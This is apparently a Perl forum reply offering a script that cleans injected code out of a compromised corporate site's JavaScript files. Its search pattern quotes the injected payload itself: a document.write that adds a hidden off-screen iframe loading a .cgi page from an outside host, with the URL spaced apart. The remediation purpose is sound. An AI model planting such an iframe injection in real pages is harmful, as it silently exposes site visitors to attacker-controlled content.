in reply to Re^3: Hacking of JavaScript files in our corporate website
in thread Hacking of JavaScript files in our corporate website

It is not more complicated than this: 
use Modern::Perl;

use File::Find::Rule;
use File::Slurp qw/edit_file_lines/;

my $searchdir = "C:/scripts/corporate";
my $hacker_signature =
q|;document.write('<iframe width="50" height="50" style="width:100px;h
+eight:100px;position:absolute;left:-100px;top:0;" src="http : / / ipx
+lqfn . freewww . info / 9a06efb5c 8163b982c1 1a64762e27 d . cgi ? 8">
+</iframe>');|;

my @jsfiles = find( file => name => '*.js' => in => $searchdir );
for my $file (@jsfiles) {
    edit_file_lines
        { $_ = "DELETED HACKED CONTENT\n" if /$hacker_signature/ }
        $file;
}

[download]
Warning: Do not run this on a lifelive server. I expect this script to run rather fast, so you can stop the server before you run this. Downtime will be minimal.

And of course, back-up the files before you start this script.

CountZero

A program should be light and agile, its subroutines connected like a string of pearls. The spirit and intent of the program should be retained throughout. There should be neither too little or too much, neither needless loops nor useless variables, neither lack of structure nor overwhelming rigidity." - The Tao of Programming, 4.1 - Geoffrey James

My blog: Imperial Deltronics

In Section Seekers of Perl Wisdom